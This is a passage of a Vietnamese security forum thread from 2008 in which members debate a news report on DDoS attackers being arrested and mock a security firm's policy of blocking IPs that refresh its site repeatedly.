Hì hì, Bác Phương Đông đã nói rồi đấy thôi. BKAV lần ra thủ phạm như thế nào chỉ có họ biết, cũng giống như việc "nâng cấp server" hay "giăng bẫy đón tin tặc" hay là cơ chế "chặn IP".
Nhưng mà mình nghĩ mãi mà vẫn không hiểu nổi:

..."Với cơ chế này, khi ai đó truy cập vào website của BKIS nếu như refresh liên tục sẽ bị chặn IP, đây là giải pháp tình thế chúng tôi phải thực hiện để ngăn chặn tấn công vì việc refresh liên tục sẽ được hiểu như một hành động bất thường và rất có thể là việc tấn công của cơ chế DDOS"...  

phát ngôn kiểu này thì không biết sinh viên IT của ĐHBK Hà Nội nghĩ gì trong đầu...
Q+SBtZW1iZXIgb2YgSFZ+B
Back to Linux soon!!!
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 02:28:51 (+0700) | #23 | 155112
seraphpl
Member

[Minus]    0    [Plus]
Joined: 04/12/2006 19:52:12
Messages: 97
Location: xxx
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]

louisnguyen27 wrote:

..."Với cơ chế này, khi ai đó truy cập vào website của BKIS nếu như refresh liên tục sẽ bị chặn IP, đây là giải pháp tình thế chúng tôi phải thực hiện để ngăn chặn tấn công vì việc refresh liên tục sẽ được hiểu như một hành động bất thường và rất có thể là việc tấn công của cơ chế DDOS"...  

phát ngôn kiểu này thì không biết sinh viên IT của ĐHBK Hà Nội nghĩ gì trong đầu...  

Hi! Khi mà số lần "refresh", hoặc truy cập của 1 IP tăng đột biến thì có thể nghi ngờ nó DDOS chứ.
Mình ko hiểu câu này của bạn lắm. Bạn có thể đưa ra vài dẫn chứng hay quan điểm cụ thể để làm sáng tỏ cho cái "phát ngôn" của bạn ko smilie
Theo bạn, nếu không xét số lần "refresh", "request" của 1 IP thì cách nào để tìm ra được IP đang DDOS mình?
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 04:28:31 (+0700) | #24 | 155128
rs
Member

[Minus]    0    [Plus]
Joined: 15/07/2008 23:07:11
Messages: 220
Location: YANYM
Offline
[Profile] [PM]

seraphpl wrote:
Hi! Khi mà số lần "refresh", hoặc truy cập của 1 IP tăng đột biến thì có thể nghi ngờ nó DDOS chứ.
Mình ko hiểu câu này của bạn lắm. Bạn có thể đưa ra vài dẫn chứng hay quan điểm cụ thể để làm sáng tỏ cho cái "phát ngôn" của bạn ko smilie
Theo bạn, nếu không xét số lần "refresh", "request" của 1 IP thì cách nào để tìm ra được IP đang DDOS mình? 

refresh là request àh?

[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 05:53:15 (+0700) | #25 | 155135
c0mm3nt
Member

[Minus]    0    [Plus]
Joined: 26/09/2008 17:21:14
Messages: 15
Offline
[Profile] [PM]

quỷ lệ wrote:

refresh là request àh?
 

Mỗi lần ấn refresh, trình duyệt sẽ gửi 1 http request tới web sever chứa website mà nó đang hiển thị
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 08:48:23 (+0700) | #26 | 155152
[Avatar]
Phuongdong
Advisor

Joined: 10/03/2003 17:46:03
Messages: 323
Offline
[Profile] [PM]
Hay rồi đây, không hiểu có ai đọc mấy cái nói chuyện với rookie của con ma lé không, loạt bài nói về DDoS HVA ngày xưa không nhỉ.
http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
@c0mm3nt : Câu bạn nói mình không hiểu lắm
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 11:03:49 (+0700) | #27 | 155160
mrro
Administrator

Joined: 27/12/2001 05:07:00
Messages: 745
Offline
[Profile] [PM]
tớ thì tớ thấy mừng khi các khứa này bị bắt. ngày nào tớ cũng thắp nhang, cầu cho chúng nó sớm siêu thoát, nhưng mà chắc là dạo này kinh tế suy thoái, cô hồn mạng nhiều quá, cúng hoài mà cũng không hết.

nghĩ lại có bác Quảng cũng đỡ khổ, chúng nó cứ bu quanh bác ấy, thành ra công việc của tớ cũng khỏe hơn mấy phần. nói tóm lại là cảm ơn bác Quảng.

--m
http://tinsang.net

TetCon 2013 http://tetcon.org

Làm an toàn thông tin thì học gì?/hvaonline/posts/list/42133.html
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 11:21:54 (+0700) | #28 | 155161
[Avatar]
hackerbinhphuoc
Member

[Minus]    0    [Plus]
Joined: 16/01/2004 09:45:41
Messages: 22
Offline
[Profile] [PM]
hehe vậy thì phải cầu cho các hack cơ tập trung vào BKIS nhiều vào để anh Quảng bắt hết, đỡ khổ cho các website khác, bkis trở thành "trung tâm xử lý các sự cố"
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 18:24:13 (+0700) | #29 | 155185
thanhks2002
Member

[Minus]    0    [Plus]
Joined: 20/12/2004 03:11:02
Messages: 48
Location: ĐH KTQD
Offline
[Profile] [PM]
Hì chả biết vụ này như thế nào nhưng mà có 2 điều rất thú vị:
- Một: Ai bắt thủ phạm? BKAV á? Ngộ àh nghen...
- Hai: Nhìn bức hình trong bài báo Dân Trí đăng tải sao thấy nó giống mã AutoIt thế
[Up] [Print Copy]
  [Question]   Re: Thủ phạm tấn công DDoS một số website VN bị bắt 14/10/2008 21:54:25 (+0700) | #30 | 155188
rs
Member

[Minus]    0    [Plus]
Joined: 15/07/2008 23:07:11
Messages: 220
Location: YANYM
Offline
[Profile] [PM]

c0mm3nt wrote:

quỷ lệ wrote:

refresh là request àh?
 

Mỗi lần ấn refresh, trình duyệt sẽ gửi 1 http request tới web sever chứa website mà nó đang hiển thị 

Bồ giải thích rõ hơn được không? ấn refresh là ấn cái gì mà lại gởi http request đến webserver? Nếu được thì tớ cũng thử ngồi "ấn refresh" để ddos cho bỏ ghét smilie

[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|